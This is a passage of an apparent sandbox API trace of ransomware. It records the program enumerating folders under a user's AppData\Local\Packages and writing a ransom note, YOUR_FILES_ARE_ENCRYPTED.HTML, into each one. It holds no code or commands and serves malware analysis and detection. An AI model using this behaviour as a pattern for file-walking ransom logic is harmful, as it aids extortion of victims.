PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0120.402] lstrlenW (lpString=".LOG1") returned 5 [0120.402] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0120.402] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93887d0c, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93887d0c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93887d0c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0120.402] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.402] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 115 [0120.402] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0120.402] lstrlenW (lpString=".LOG2") returned 5 [0120.402] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0120.402] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93887d0c, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93887d0c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93887d0c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0120.402] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0120.402] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0120.402] GetProcessHeap () returned 0x600000 [0120.402] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.403] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.404] CloseHandle (hObject=0x31c) returned 1 [0120.404] GetProcessHeap () returned 0x600000 [0120.404] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.404] GetProcessHeap () returned 0x600000 [0120.404] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.404] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0120.404] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.404] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\SystemAppData") returned 102 [0120.404] GetProcessHeap () returned 0x600000 [0120.404] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.405] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\SystemAppData" [0120.405] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\SystemAppData\\*" [0120.405] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.405] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 1 [0120.405] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 0 [0120.405] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.405] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0120.405] GetProcessHeap () returned 0x600000 [0120.405] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.406] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.407] CloseHandle (hObject=0x31c) returned 1 [0120.407] GetProcessHeap () returned 0x600000 [0120.407] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.407] GetProcessHeap () returned 0x600000 [0120.407] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.407] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0120.407] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.407] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\TempState") returned 98 [0120.407] GetProcessHeap () returned 0x600000 [0120.407] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.407] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\TempState" [0120.407] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\TempState\\*" [0120.407] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.407] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 1 [0120.408] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 0 [0120.408] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.408] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0120.408] GetProcessHeap () returned 0x600000 [0120.408] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.408] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.410] CloseHandle (hObject=0x31c) returned 1 [0120.410] GetProcessHeap () returned 0x600000 [0120.410] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.410] GetProcessHeap () returned 0x600000 [0120.410] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.410] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0120.410] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0120.410] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0120.410] GetProcessHeap () returned 0x600000 [0120.410] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3106fd8 [0120.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0120.411] WriteFile (in: hFile=0x214, lpBuffer=0x3106fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3106fd8*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0120.412] CloseHandle (hObject=0x214) returned 1 [0120.412] GetProcessHeap () returned 0x600000 [0120.412] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.412] GetProcessHeap () returned 0x600000 [0120.412] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0120.414] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13db988c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x169557db, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.WindowsMaps_8wekyb3d8bbwe", cAlternateFileName="MID92F~1.WIN")) returned 1 [0120.414] StrStrIW (lpFirst="Microsoft.WindowsMaps_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.414] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe") returned 84 [0120.414] GetProcessHeap () returned 0x600000 [0120.414] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0120.414] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe" [0120.415] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\*" [0120.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13db988c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x169557db, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.418] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13db988c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x169557db, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0120.418] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x13db988c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13db988c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0120.418] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.418] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC") returned 87 [0120.418] GetProcessHeap () returned 0x600000 [0120.418] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.419] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC" [0120.419] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\*" [0120.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x13db988c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13db988c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.426] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x13db988c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13db988c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.426] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0120.426] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.426] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache") returned 97 [0120.426] GetProcessHeap () returned 0x600000 [0120.426] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.427] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache" [0120.427] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\*" [0120.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x62e9e8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.428] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, 